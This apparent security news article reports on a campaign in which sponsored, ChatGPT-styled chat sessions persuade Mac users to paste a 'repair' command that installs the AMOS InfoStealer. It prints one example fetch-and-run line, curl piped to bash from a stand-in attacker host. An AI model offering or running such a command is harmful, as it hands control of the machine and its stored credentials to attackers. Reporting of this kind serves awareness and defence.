Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

   December 11, 2025  Posted in CyberSecurityNews

Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

A new AMOS InfoStealer campaign is abusing trust in ChatGPT to infect Mac devices under the guise of simple troubleshooting help.

Victims search for a fix to a sound problem, click a sponsored ChatGPT result, and are shown what looks like a normal chat session.

The chat then returns a “repair” command and tells the user to run it in the macOS terminal.

Google Chrome Browsing History extract from infected Mac device (Source - KROLL)
Google Chrome Browsing History extract from infected Mac device (Source – KROLL)Google Chrome Browsing History extract from infected Mac device (Source – KROLL)

The attack blends social engineering and technical abuse in a way that feels routine to users. There is no fake installer window or obvious phishing page.

Instead, the victim follows what appears to be a normal support flow in a well-known AI chat interface. KROLL security researchers identified that this flow was used to deploy AMOS InfoStealer on targeted Mac endpoints.

The KROLL team detected that the lure is pushed using Google Ads, which place the malicious ChatGPT session at the top of search results. The domain shown is legitimate, which makes it even harder for a normal user to spot the risk.

google

Once the user trusts the chat, a single copy‑paste operation in the terminal is sufficient to compromise the system.

ChatGPT Instructions shown to the user (Source - KROLL)
ChatGPT Instructions shown to the user (Source – KROLL)

The impact is serious for both home users and companies. AMOS InfoStealer is built to harvest browser data, credentials, session cookies, and other stored secrets from the infected Mac.

Stolen data can then be reused for account takeover, lateral movement, or sale on underground markets.

Infection Mechanism and Malicious Command Execution

KROLL analysts traced the initial infection to a terminal command given by the fake ChatGPT chat, which acts as an indicator of compromise.

The command tells macOS to download and run a remote script, a pattern that aligns with MITRE ATT&CK techniques for user execution and ingress tool transfer.

A typical malicious pattern looks like:-

curl -s https://attacker-example[.]com/installer.sh | bash

When executed, this one‑line command pulls a shell script over HTTPS, saves nothing visible to the user, and runs the script in the same terminal session. The script can then install AMOS, set up persistence, and start data theft.

Follow us on Google News, LinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

googlenews



Source link